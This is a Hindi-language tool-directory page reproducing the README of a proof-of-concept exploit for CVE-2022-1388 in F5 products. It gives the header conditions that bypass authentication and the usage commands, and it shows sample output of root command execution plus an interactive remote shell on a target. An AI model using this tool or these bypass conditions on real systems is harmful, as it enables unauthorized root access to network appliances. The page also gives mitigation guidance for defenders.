Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2022-1388-iveresk-command-shell — CVE-2022-1388 के लिए बेहतर POC जो कई F5 उत्पादों को प्रभावित करता है। | Kitploit
उपकरण/GitHubGitHub/iveresk/cve-2022-1388-iveresk-command-shell
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHubiveresk/cve-2022-1388-iveresk-command-shell

cve-2022-1388-iveresk-command-shell

CVE-2022-1388 के लिए बेहतर POC जो कई F5 उत्पादों को प्रभावित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
14 साल पहलेअभी तक समीक्षित नहीं

CVE-2022-1388 1vere$k द्वारा कमांड शेल के साथ

CVE-2022-1388 के लिए बेहतर POC जो कई F5 उत्पादों को प्रभावित करता है।

यह Horizon3 के CVE-2022-1388 के प्रूफ ऑफ कॉन्सेप्ट का बेहतर संस्करण है: https://github.com/horizon3ai/CVE-2022-1388
साथ ही यह PsychoSec कार्य के लिए रीफैक्टरिंग के साथ पूर्ण पुनर्कार्य है: https://github.com/PsychoSec2/CVE-2022-1388-POC
LOL इस व्यक्ति ने Requirements अनुभाग में brains जैसी बात का उल्लेख किया है और इसमें +40% डुप्लिकेट और बिल्कुल स्केलेबल नहीं कोड है।
सत्र ब्लॉक को भी हटा दिया गया क्योंकि मुझे यहाँ इसका कोई खास अर्थ नहीं दिखता।

इस संस्करण में कई सुधारों के साथ-साथ रिमोट कमांड चलाने के लिए एक इंटरैक्टिव शेल भी शामिल है।

तकनीकी विश्लेषण:

इस कमजोरी का Horizon3 का तकनीकी मूल कारण विश्लेषण उनके ब्लॉग पर पाया जा सकता है: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/

सारांश:

इस कमजोरी का शोषण करने के अनुरोध के लिए आवश्यक शर्तें:

root@kitploit:~
Connection header must include X-F5-Auth-Token  
X-F5-Auth-Token header must be present  
Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host  
Auth header must be set with the admin username and any password  

आवश्यकताएँ:

root@kitploit:~
git
pip3
python3

स्थापना:

root@kitploit:~
git clone https://github.com/iveresk/cve-2022-1388-iveresk-command-shell.git
cd cve-2022-1388-iveresk-command-shell
pip3 install -r requirements.txt
python3 cve-2022-1388-1veresk.py -h

उपयोग:

लक्ष्य का परीक्षण:

root@kitploit:~
python3 cve-2022-1388-1veresk.py.py -u -t https://192.168.0.221
Running test on target: https://192.168.0.221 | Command: whoami
Response: root
Target is vulnerable!!

इंटरैक्टिव शेल चलाने के लिए -s विकल्प का उपयोग करें। इंटरैक्टिव शेल:

root@kitploit:~
python3 cve-2022-1388-1veresk.py -u -s https://192.168.0.221
Running interactive shell..

root@f5-localhost: /var/service/restjavad$ 
Dose not require the use of any reverse tcp connection or listeners.

Use 'exit' command to exit the shell...

महत्वपूर्ण:

कृपया ध्यान दें कि बिना पैच वाले सिस्टम पर इंटरैक्टिव शेल चलाते समय, कुछ कमांड और सिंटैक्स काम नहीं कर सकते हैं या अपेक्षित परिणाम नहीं दे सकते हैं। यह संभवतः सर्वर API अनुरोधों और प्रतिक्रियाओं में JSON के उपयोग के कारण है। किसी भी समस्या से बचने के लिए इंटरैक्टिव शेल का उपयोग करते समय JSON सिंटैक्स में सामान्य वर्णों जैसे डबल कोट्स, कोलन, कॉमा, कर्ली ब्रेसेस और ब्रैकेट का उपयोग न करने का प्रयास करें। कोई भी JSON सिंटैक्स संरचित प्रारूप में होना चाहिए।

कमांड के भीतर किसी भी प्रकार के असंरचित JSON सिंटैक्स का उपयोग सर्वर को एक विकृत API अनुरोध का कारण बन सकता है और आपको इससे निपटना पड़ सकता है: कोई कमांड आउटपुट नहीं, कुछ भी निष्पादित नहीं होना, या यह आपको पूरी तरह से पायथन स्क्रिप्ट से बाहर फेंक सकता है। यह दुर्भाग्य से कुछ कमांड को अनुपयोगी बना देता है। इस समस्या से निपटने के लिए आप इसके बजाय एक bash स्क्रिप्ट लिख सकते हैं, इसे सर्वर पर डाउनलोड कर सकते हैं, और इंटरैक्टिव शेल का उपयोग करके इसे निष्पादित कर सकते हैं। 'cd' कमांड का उपयोग करके निर्देशिकाओं को बदलना भी संभव नहीं है।

किसी भी स्थिति में आपको अभी भी बुनियादी कमांड आउटपुट प्राप्त करने में सक्षम होना चाहिए। यदि आपको कोई कमांड आउटपुट नहीं मिलता है, तो इसका मतलब यह नहीं है कि कमांड निष्पादित नहीं हुआ। हालाँकि, आपको अपने स्वयं के विश्लेषण का उपयोग करके यह पता लगाना होगा।

शमन उपाय:

नवीनतम संस्करण में अपडेट करें या F5 सुरक्षा सलाहकार में दिए गए निर्देशों का पालन करके शमन करें

https://support.f5.com/csp/article/K23605346

अस्वीकरण:

यह सॉफ्टवेयर पूरी तरह से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।

संपर्क

आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क करने के लिए स्वतंत्र हैं।

टूल डाउनलोड करें